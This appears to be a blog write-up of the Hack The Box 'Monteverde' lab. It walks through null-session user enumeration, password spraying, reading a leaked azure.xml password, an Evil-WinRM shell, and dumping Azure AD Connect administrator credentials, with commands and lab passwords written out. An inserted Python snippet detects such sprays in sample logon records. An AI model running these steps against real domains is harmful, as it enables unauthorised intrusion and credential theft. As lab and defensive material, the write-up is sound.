Enumerate Credentials stored in Azure AD Connect and on a Domain Controller

Uli
4 min read · Jun 14, 2020

Required Information:

  1. IP Address of the Server with Azure AD Connect installed.
  2. Tools that will do the Job for us.

Required Tools:

  1. Nmap: Scan for Ports and identify what kind of Server is running. Pro Tip: TCP DNS (53) along with Kerberos (TCP 88) and LDAP (TCP 389) suggests a domain controller.
  2. windapsearch: Tool for Active Directory Domain enumeration through LDAP queries. It contains several modules to enumerate users, groups, computers, as well as perform searching and unauthenticated information gathering.
  3. rpcclient: Enumerate domain users (and groups) over MS-RPC, here through a null session.
  4. crackmapexec: Try a list of candidate passwords against a list of users (password spraying).
  5. Evil-WinRM: A WinRM shell used in post-exploitation.

Most of the Tools are already installed in Kali and ParrotOS.

Let's try those tools on a virtual machine. The machine is called Monteverde and is hosted by Hack The Box. You can find more about it at: https://www.hackthebox.eu

TLDR:

The domain is enumerated and a user list is created. Through password spraying, the SABatchJobs service account is found to have its username as its password. Using this service account, it is possible to enumerate SMB shares on the system, and the users$ share is found to be world-readable. An XML file used for an Azure AD account is found within a user folder and contains a password. Due to password reuse, we can connect to the domain controller as mhope using WinRM. Enumeration shows that Azure AD Connect is installed. It is possible to extract the credentials for the account that replicates the directory changes to Azure (in this case the default domain administrator).

Let's start!

Steps to pwn the Machine:

  1. Enumeration
  2. Exploitation / Foothold
  3. Privilege Escalation

1. Enumeration

We start by checking for open ports to get an idea of what services are running:

nmap -sC -sV -oA monteverde 10.10.10.172   # -oA needs an output basename; "monteverde" is just a chosen name

We get the following output:

PORT      STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
49673/tcp open unknown
49702/tcp open unknown
49771/tcp open unknown

TCP DNS (53) along with Kerberos (TCP 88) and LDAP (TCP 389) suggests a domain controller. Port 445 (SMB) is also very interesting and lets us connect with rpcclient.

So let's use rpcclient with a null session (empty username, no password):

rpcclient -U '' -N 10.10.10.172

Voila! We got a connection. Let's enumerate all domain users with enumdomusers:

rpcclient $> enumdomusers

2. Foothold

The next step is to create a wordlist of all these users; with some luck, one of them uses a password from our list (in this case the username itself):

Run CrackMapExec with this password list and the user list:

crackmapexec smb 10.10.10.172 -u <user list> -p <password list>
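The spray above shows up on the domain controller as a burst of failed logons from one source against many different accounts. As an added example (not part of the original post), here is the detection a defender would run over such records, using constructed sample lines in a simplified "timestamp, event id, source ip, account" shape rather than real event logs; the account names, IPs and the 5-users-in-10-minutes threshold are assumptions:

```python
"""Detect a password spray, and the account it landed on, in constructed
Windows logon records (added example, not from the original post)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records, one per line: "<timestamp> <event id> <source ip> <account>".
# 4625 = failed logon, 4624 = successful logon. An SMB spray shows up on the DC as
# many 4625s from one source against many different accounts in a short time.
SAMPLE_LOG = r"""
2020-06-14T10:00:01 4625 192.0.2.10 MEGABANK\alice
2020-06-14T10:00:02 4625 192.0.2.10 MEGABANK\bob
2020-06-14T10:00:02 4625 192.0.2.10 MEGABANK\carol
2020-06-14T10:00:03 4625 192.0.2.10 MEGABANK\mhope
2020-06-14T10:00:04 4625 192.0.2.10 MEGABANK\SABatchJobs
2020-06-14T10:00:05 4624 192.0.2.10 MEGABANK\SABatchJobs
2020-06-14T10:05:00 4625 192.0.2.20 MEGABANK\dave
2020-06-14T10:05:30 4625 192.0.2.20 MEGABANK\dave
"""

def parse_log(text):
    """Return a list of (timestamp, event_id, source_ip, account) tuples."""
    events = []
    for line in text.strip().splitlines():
        ts, event_id, src, account = line.split()
        events.append((datetime.fromisoformat(ts), event_id, src, account))
    return events

def find_spray_sources(events, min_users=5, window=timedelta(minutes=10)):
    """Map each source IP that failed logons for at least `min_users` distinct
    accounts inside any `window`-long span to the sorted accounts it tried."""
    failures = defaultdict(list)
    for ts, event_id, src, account in events:
        if event_id == "4625":
            failures[src].append((ts, account))
    hits = {}
    for src, items in failures.items():
        items.sort()
        lo = 0
        for hi in range(len(items)):          # sliding window over sorted failures
            while items[hi][0] - items[lo][0] > window:
                lo += 1
            if len({a for _, a in items[lo:hi + 1]}) >= min_users:
                hits[src] = sorted({a for _, a in items})
                break
    return hits

def successful_logons_from(events, sources):
    """Accounts a flagged source later logged on with (4624): the credentials
    most likely compromised, so the ones to reset first."""
    return {src: sorted({a for _, e, s, a in events if s == src and e == "4624"})
            for src in sources}
```

Calling `find_spray_sources(parse_log(SAMPLE_LOG))` flags only 192.0.2.10 (the second source repeatedly failing on one account is a user mistyping, not a spray), and `successful_logons_from` then names SABatchJobs as the account that accepted a sprayed password.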

Now we have a password for the user SABatchJobs (SABatchJobs:SABatchJobs), i.e. valid domain credentials. Let's connect with smbmap using those credentials:

smbmap -u SABatchJobs -p SABatchJobs -d megabank -H 10.10.10.172 -x whoami

Next we look inside the users$ share for more information:

We found a file called azure.xml. The user associated with this file is mhope.

Open the file with cat:

cat 10.10.10.172-users_mhope_azure.xml

We find a line which has the Password:

<S N="Password">4n0therD4y@n0th3r$</S>

Now we have an Azure AD password: 4n0therD4y@n0th3r$

Let's try to connect with Evil-WinRM (single quotes keep the shell from expanding the $ in the password):

evil-winrm -i 10.10.10.172 -u mhope -p '4n0therD4y@n0th3r$'

We now have a shell as mhope, a user who is a member of the MEGABANK\Azure Admins group.

3. Privilege Escalation

To get the Domain Admin password we use a PowerShell script that extracts the credentials Azure AD Connect stores locally for its AD DS connector account (here the default domain administrator). You can find the Azure-ADConnect.ps1 file at: https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Azure-ADConnect.ps1

  1. First we point Evil-WinRM at the local directory holding the script with the -s flag; typing the script's name at the Evil-WinRM prompt then loads it into memory on the target:

evil-winrm -i 10.10.10.172 -u mhope -p '4n0therD4y@n0th3r$' -s .
Azure-ADConnect.ps1   # typed inside the Evil-WinRM shell to load the script

  2. Print the password:

Get-ADConnectPassword

Let's verify that the creds work:

evil-winrm -i 10.10.10.172 -u administrator -p 'd0m@in4dminyeah!'

Done :)

Source:

Things that helped me: the official writeup and the tutorial by IppSec, which you can find here: https://www.youtube.com/watch?v=HTJjPZvOtJ4&feature=youtu.be
